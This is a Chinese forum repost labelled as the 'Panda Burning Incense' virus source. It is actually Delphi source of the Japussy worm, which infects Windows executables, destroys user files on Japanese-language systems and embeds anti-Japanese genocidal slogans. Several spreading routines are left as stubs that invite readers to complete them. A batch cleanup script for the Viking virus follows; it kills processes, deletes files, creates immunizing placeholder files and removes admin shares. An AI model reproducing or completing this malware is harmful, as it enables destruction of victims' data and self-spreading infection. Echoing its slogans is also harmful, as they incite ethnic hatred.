熊貓燒香——原代碼,! 來源:BBS.TONGJI.NET
熊貓燒香——原代碼,! program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI{ , Registry}; const HeaderSize = 82432; //病毒體的大小 IconOffset = $12EB8; //PE文件主圖標(biāo)的偏移量 //在我的Delphi5 SP1上面編譯得到的大小,,其它版本的Delphi可能不同 //查找2800000020的十六進制字符串可以找到主圖標(biāo)的偏移量 { HeaderSize = 38912; //Upx壓縮過病毒體的大小 IconOffset = $92BC; //Upx壓縮過PE文件主圖標(biāo)的偏移量 //Upx 1.24W 用法: upx -9 --8086 Japussy.exe } IconSize = $2E8; //PE文件主圖標(biāo)的大小--744字節(jié) IconTail = IconOffset + IconSize; //PE文件主圖標(biāo)的尾部 ID = $44444444; //感染標(biāo)記 //垃圾碼,,以備寫入 Catchword = ''''''''''''''''If a race need to be killed out, it must be Yamato. '''''''''''''''' + ''''''''''''''''If a country need to be destroyed, it must be Japan! '''''''''''''''' + ''''''''''''''''*** W32.Japussy.Worm.A ***''''''''''''''''; { $R *.RES} function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external ''''''''''''''''Kernel32.dll''''''''''''''''; //函數(shù)聲明 var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; //日文操作系統(tǒng)標(biāo)記 { 判斷是否為Win9x } function IsWin9x: Boolean; var Ver: TOSVersionInfo; begin Result := False; Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); if not GetVersionEx(Ver) then Exit; if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x Result := True; end; { 在流之間復(fù)制 } procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer); var sCurPos, dCurPos: Integer; begin sCurPos := Src.Position; dCurPos := Dst.Position; Src.Seek(sStartPos, 0); Dst.Seek(dStartPos, 0); Dst.CopyFrom(Src, Count); Src.Seek(sCurPos, 0); Dst.Seek(dCurPos, 0); end; { 將宿主文件從已感染的PE文件中分離出來,,以備使用 } procedure ExtractFile(FileName: string); var sStream, dStream: TFileStream; begin try sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try dStream := TFileStream.Create(FileName, fmCreate); try sStream.Seek(HeaderSize, 0); //跳過頭部的病毒部分 dStream.CopyFrom(sStream, sStream.Size - HeaderSize); finally dStream.Free; end; finally sStream.Free; end; except end; end; { 填充STARTUPINFO結(jié)構(gòu) } procedure FillStartupInfo(var Si: STARTUPINFO; State: Word); begin Si.cb := SizeOf(Si); Si.lpReserved := nil; Si.lpDesktop := nil; Si.lpTitle := nil; Si.dwFlags := STARTF_USESHOWWINDOW; Si.wShowWindow := State; Si.cbReserved2 := 0; Si.lpReserved2 := nil; end; { 發(fā)帶毒郵件 } procedure SendMail; begin //哪位仁兄愿意完成之? end; { 感染PE文件 } procedure InfectOneFile(FileName: string); var HdrStream, SrcStream: TFileStream; IcoStream, DstStream: TMemoryStream; iID: LongInt; aIcon: TIcon; Infected, IsPE: Boolean; i: Integer; Buf: array[0..1] of Char; begin try //出錯則文件正在被使用,,退出 if CompareText(FileName, ''''''''''''''''JAPUSSY.EXE'''''''''''''''') = 0 then //是自己則不感染 Exit; Infected := False; IsPE := False; SrcStream := TFileStream.Create(FileName, fmOpenRead); try for i := 0 to $108 do //檢查PE文件頭 begin SrcStream.Seek(i, soFromBeginning); SrcStream.Read(Buf, 2); if (Buf[0] = #80) and (Buf[1] = #69) then //PE標(biāo)記 begin IsPE := True; //是PE文件 Break; end; end; SrcStream.Seek(-4, soFromEnd); //檢查感染標(biāo)記 SrcStream.Read(iID, 4); if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染 Infected := True; finally SrcStream.Free; end; if Infected or (not IsPE) then //如果感染過了或不是PE文件則退出 Exit; IcoStream := TMemoryStream.Create; DstStream := TMemoryStream.Create; try aIcon := TIcon.Create; try //得到被感染文件的主圖標(biāo)(744字節(jié)),,存入流 aIcon.ReleaseHandle; aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0); aIcon.SaveToStream(IcoStream); finally aIcon.Free; end; SrcStream := TFileStream.Create(FileName, fmOpenRead); //頭文件 HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try //寫入病毒體主圖標(biāo)之前的數(shù)據(jù) CopyStream(HdrStream, 0, DstStream, 0, IconOffset); //寫入目前程序的主圖標(biāo) CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize); //寫入病毒體主圖標(biāo)到病毒體尾部之間的數(shù)據(jù) CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail); //寫入宿主程序 CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size); //寫入已感染的標(biāo)記 DstStream.Seek(0, 2); iID := $44444444; DstStream.Write(iID, 4); finally HdrStream.Free; end; finally SrcStream.Free; IcoStream.Free; DstStream.SaveToFile(FileName); //替換宿主文件 DstStream.Free; end; except; end; end; { 將目標(biāo)文件寫入垃圾碼后刪除 } procedure SmashFile(FileName: string); var FileHandle: Integer; i, Size, Mass, Max, Len: Integer; begin try SetFileAttributes(PChar(FileName), 0); //去掉只讀屬性 FileHandle := FileOpen(FileName, fmOpenWrite); //打開文件 try Size := GetFileSize(FileHandle, nil); //文件大小 i := 0; Randomize; Max := Random(15); //寫入垃圾碼的隨機次數(shù) if Max < 5 then Max := 5; Mass := Size div Max; //每個間隔塊的大小 Len := Length(Catchword); while i < Max do begin FileSeek(FileHandle, i * Mass, 0); //定位 //寫入垃圾碼,將文件徹底破壞掉 FileWrite(FileHandle, Catchword, Len); Inc(i); end; finally FileClose(FileHandle); //關(guān)閉文件 end; DeleteFile(PChar(FileName)); //刪除之 except end; end; { 獲得可寫的驅(qū)動器列表 } function GetDrives: string; var DiskType: Word; D: Char; Str: string; i: Integer; begin for i := 0 to 25 do //遍歷26個字母 begin D := Chr(i + 65); Str := D + '''''''''''''''':\''''''''''''''''; DiskType := GetDriveType(PChar(Str)); //得到本地磁盤和網(wǎng)絡(luò)盤 if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then Result := Result + D; end; end; { 遍歷目錄,,感染和摧毀文件 } procedure LoopFiles(Path, Mask: string); var i, Count: Integer; Fn, Ext: string; SubDir: TStrings; SearchRec: TSearchRec; Msg: TMsg; function IsValidDir(SearchRec: TSearchRec): Integer; begin if (SearchRec.Attr <> 16) and (SearchRec.Name <> ''''''''''''''''.'''''''''''''''') and (SearchRec.Name <> ''''''''''''''''..'''''''''''''''') then Result := 0 //不是目錄 else if (SearchRec.Attr = 16) and (SearchRec.Name <> ''''''''''''''''.'''''''''''''''') and (SearchRec.Name <> ''''''''''''''''..'''''''''''''''') then Result := 1 //不是根目錄 else Result := 2; //是根目錄 end; begin if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then begin repeat PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //調(diào)整消息隊列,,避免引起懷疑 if IsValidDir(SearchRec) = 0 then begin Fn := Path + SearchRec.Name; Ext := UpperCase(ExtractFileExt(Fn)); if (Ext = ''''''''''''''''.EXE'''''''''''''''') or (Ext = ''''''''''''''''.SCR'''''''''''''''') then begin InfectOneFile(Fn); //感染可執(zhí)行文件 end else if (Ext = ''''''''''''''''.HTM'''''''''''''''') or (Ext = ''''''''''''''''.HTML'''''''''''''''') or (Ext = ''''''''''''''''.ASP'''''''''''''''') then begin //感染HTML和ASP文件,將Base64編碼后的病毒寫入 //感染瀏覽此網(wǎng)頁的所有用戶 //哪位大兄弟愿意完成之,? end else if Ext = ''''''''''''''''.WAB'''''''''''''''' then //Outlook地址簿文件 begin //獲取Outlook郵件地址 end else if Ext = ''''''''''''''''.ADC'''''''''''''''' then //Foxmail地址自動完成文件 begin //獲取Foxmail郵件地址 end else if Ext = ''''''''''''''''IND'''''''''''''''' then //Foxmail地址簿文件 begin //獲取Foxmail郵件地址 end else begin if IsJap then //是倭文操作系統(tǒng) begin if (Ext = ''''''''''''''''.DOC'''''''''''''''') or (Ext = ''''''''''''''''.XLS'''''''''''''''') or (Ext = ''''''''''''''''.MDB'''''''''''''''') or (Ext = ''''''''''''''''.MP3'''''''''''''''') or (Ext = ''''''''''''''''.RM'''''''''''''''') or (Ext = ''''''''''''''''.RA'''''''''''''''') or (Ext = ''''''''''''''''.WMA'''''''''''''''') or (Ext = ''''''''''''''''.ZIP'''''''''''''''') or (Ext = ''''''''''''''''.RAR'''''''''''''''') or (Ext = ''''''''''''''''.MPEG'''''''''''''''') or (Ext = ''''''''''''''''.ASF'''''''''''''''') or (Ext = ''''''''''''''''.JPG'''''''''''''''') or (Ext = ''''''''''''''''.JPEG'''''''''''''''') or (Ext = ''''''''''''''''.GIF'''''''''''''''') or (Ext = ''''''''''''''''.SWF'''''''''''''''') or (Ext = ''''''''''''''''.PDF'''''''''''''''') or (Ext = ''''''''''''''''.CHM'''''''''''''''') or (Ext = ''''''''''''''''.AVI'''''''''''''''') then SmashFile(Fn); //摧毀文件 end; end; end; //感染或刪除一個文件后睡眠200毫秒,,避免CPU占用率過高引起懷疑 Sleep(200); until (FindNext(SearchRec) <> 0); end; FindClose(SearchRec); SubDir := TStringList.Create; if (FindFirst(Path + ''''''''''''''''*.*'''''''''''''''', faDirectory, SearchRec) = 0) then begin repeat if IsValidDir(SearchRec) = 1 then SubDir.Add(SearchRec.Name); until (FindNext(SearchRec) <> 0); end; FindClose(SearchRec); Count := SubDir.Count - 1; for i := 0 to Count do LoopFiles(Path + SubDir.Strings + ''''''''''''''''\'''''''''''''''', Mask); FreeAndNil(SubDir); end; { 遍歷磁盤上所有的文件 } procedure InfectFiles; var DriverList: string; i, Len: Integer; begin if GetACP = 932 then //日文操作系統(tǒng) IsJap := True; //去死吧! DriverList := GetDrives; //得到可寫的磁盤列表 Len := Length(DriverList); while True do //死循環(huán) begin for i := Len downto 1 do //遍歷每個磁盤驅(qū)動器 LoopFiles(DriverList + '''''''''''''''':\'''''''''''''''', ''''''''''''''''*.*''''''''''''''''); //感染之 SendMail; //發(fā)帶毒郵件 Sleep(1000 * 60 * 5); //睡眠5分鐘 end; end; { 主程序開始 } begin if IsWin9x then //是Win9x RegisterServiceProcess(GetCurrentProcessID, 1) //注冊為服務(wù)進程 else //WinNT begin //遠程線程映射到Explorer進程 //哪位兄臺愿意完成之,? end; //如果是原始病毒體自己 if CompareText(ExtractFileName(ParamStr(0)), ''''''''''''''''Japussy.exe'''''''''''''''') = 0 then InfectFiles //感染和發(fā)郵件 else //已寄生于宿主程序上了,,開始工作 begin TmpFile := ParamStr(0); //創(chuàng)建臨時文件 Delete(TmpFile, Length(TmpFile) - 4, 4); TmpFile := TmpFile + #32 + ''''''''''''''''.exe''''''''''''''''; //真正的宿主文件,多一個空格 ExtractFile(TmpFile); //分離之 FillStartupInfo(Si, SW_SHOWDEFAULT); CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, 0, nil, ''''''''''''''''.'''''''''''''''', Si, Pi); //創(chuàng)建新進程運行之 InfectFiles; //感染和發(fā)郵件 end; end. 請轉(zhuǎn)帖的朋友標(biāo)明出處 <!-- CETagParser ~url <a href="http://www." target=_blank>http://www.<!-- CETagParser ~/url </a> 以下為清除威金,、熊貓燒香病毒的批處理 @echo off title 清除威金(logo_1,熊貓燒香)病毒最新變種工具 @echo 清除VIKING病毒最新變種工具 pause if exist %windir%\rundl132.exe echo ---報告老大,,發(fā)現(xiàn)有威金病毒埋伏! 讓我來干掉它----- if exist %windir%\logo_1.exe echo ---報告老大,發(fā)現(xiàn)有威金病毒埋伏!讓我來干掉它 ----- //殺viking進程 tskill logo_1 tskill rundl132 tskill zt tskill wow tskill logo1_ tskill Ravmon tskill Eghost tskill Mailmon tskill KAVPFW tskill IPARMOR tskill Ravmond taskkill /f /im 0sy.exe taskkill /f /im 1sy.exe taskkill /f /im 2sy.exe taskkill /f /im 3sy.exe taskkill /f /im 4sy.exe taskkill /f /im 5sy.exe taskkill /f /im 6sy.exe taskkill /f /im 7sy.exe taskkill /f /im 8sy.exe taskkill /f /im 9sy.exe //刪除木馬 del d:\_desktop.ini /f/s/q/a del c:\Program Files\_desktop.ini del %Windir%\MickNew\MickNew.dll del %Windir%\MH_FILE\MH_DLL.dll del %Windir%\_desktop.ini del %Windir%\TODAYZTKING\TODAYZTKING.DLL attrib -h -r -s c:\go.exe del c:\go.exe del c:\setup.exe attrib -h -s -r c:\autorun.inf del c:\autorun.inf attrib -h -r -s d:\go.exe del d:\go.exe del d:\setup.exe attrib -h -s -r d:\autorun.inf del d:\autorun.inf del e:\setup.exe attrib -h -r -s e:\go.exe del e:\go.exe attrib -h -s -r e:\autorun.inf del e:\autorun.inf attrib -h -r -s f:\go.exe del f:\go.exe del f:\setup.exe attrib -h -s -r f:\autorun.inf del f:\autorun.inf attrib -h -r -s g:\go.exe del g:\go.exe del g:\setup.exe attrib -h -s -r g:\autorun.inf del g:\autorun.inf del h:\go.exe del h:\setup.exe attrib -h -s -r g:\autorun.inf del h:\autorun.inf del i:\go.exe attrib -h -s -r g:\autorun.inf del i:\autorun.inf del i:\setup.exe del j:\go.exe attrib -h -s -r g:\autorun.inf del j:\autorun.inf del j:\setup.exe del %windir%\system\Logo1_.exedel %windir%\system\Logo_1.exe del %windir%\rundl132.exe del %windir%\vDll.dll del %windir%\Dll.dll del %windir%\0Sy.exe del %windir%\1Sy.exe del %windir%\2Sy.exe del %windir%\3Sy.exe del %windir%\5Sy.exe del %windir%\1.com @echo ^_^ 報告老大,,VIKING已經(jīng)全都被處死 @echo 真累哈,再給你的系統(tǒng)免疫下,不需要的話請直接退出 pause //免疫系統(tǒng) echo > %windir%\Logo1_.exe echo > %windir%\rundl132.exe echo > %windir%\0Sy.exe echo > %windir%\vDll.dll echo > %windir%\1Sy.exe echo > %windir%\2Sy.exe echo > %windir%\rundll32.exe echo > %windir%\3Sy.exe echo > %windir%\5Sy.exe echo > %windir%\1.com echo > %windir%\exerouter.exe echo > %windir%\EXP10RER.com echo > %windir%\finders.com echo > %windir%\Shell.sys echo > %windir%\kill.exe echo > %windir%\sws.dll echo > %windir%\sws32.dll echo > %windir%\uninstall\rundl132.exe echo > %windir%\SVCHOST.exe echo > %windir%\WINLOGON.exe echo > %windir%\RUNDLL32.EXE echo > C:\"Program Files"\svchost.exe echo > C:\"Program Files"\"Internet Explorer"\svchost.exe echo > %windir%\Download\svchost.exe echo > %windir%\system32\wldll.dll attrib %windir%\Logo1_.exe +s +r +h attrib %windir%\rundl132.exe +s +r +h attrib %windir%\0Sy.exe +s +r +h attrib %windir%\vDll.dll +s +r +h attrib %windir%\1Sy.exe +s +r +h attrib %windir%\2Sy.exe +s +r +h attrib %windir%\rundll32.exe +s +r +h attrib %windir%\3Sy.exe +s +r +h attrib %windir%\5Sy.exe +s +r +h attrib %windir%\1.com +s +r +h attrib %windir%\exerouter.exe +s +r +h attrib %windir%\EXP10RER.com +s +r +h attrib %windir%\finders.com +s +r +h attrib %windir%\Shell.sys +s +r +h attrib %windir%\kill.exe +s +r +h attrib %windir%\sws.dll +s +r +h attrib %windir%\sws32.dll +s +r +h attrib %windir%\uninstall\rundl132.exe +s +r +h attrib %windir%\SVCHOST.exe +s +r +h attrib %windir%\WINLOGON.exe +s +r +h attrib %windir%\RUNDLL32.EXE +s +r +h attrib C:\"Program Files"\svchost.exe +s +r +h attrib C:\"Program Files"\"Internet Explorer"\svchost.exe +s +r +h attrib %windir%\Download\svchost.exe +s +r +h attrib %windir%\system32\wldll.dll +s +r +h net share c$ /del net share d$ /del net share e$ /del net share f$ /del net share admin$ /del net share ipc$ /del cls @echo ------------------------------------- @echo viking已經(jīng)全部被我殺完拉,哈,厲害吧 @echo 系統(tǒng)已經(jīng)成功免疫! @echo 謝謝你的使用,請重啟您的電腦! @echo ------------------------------------- pause |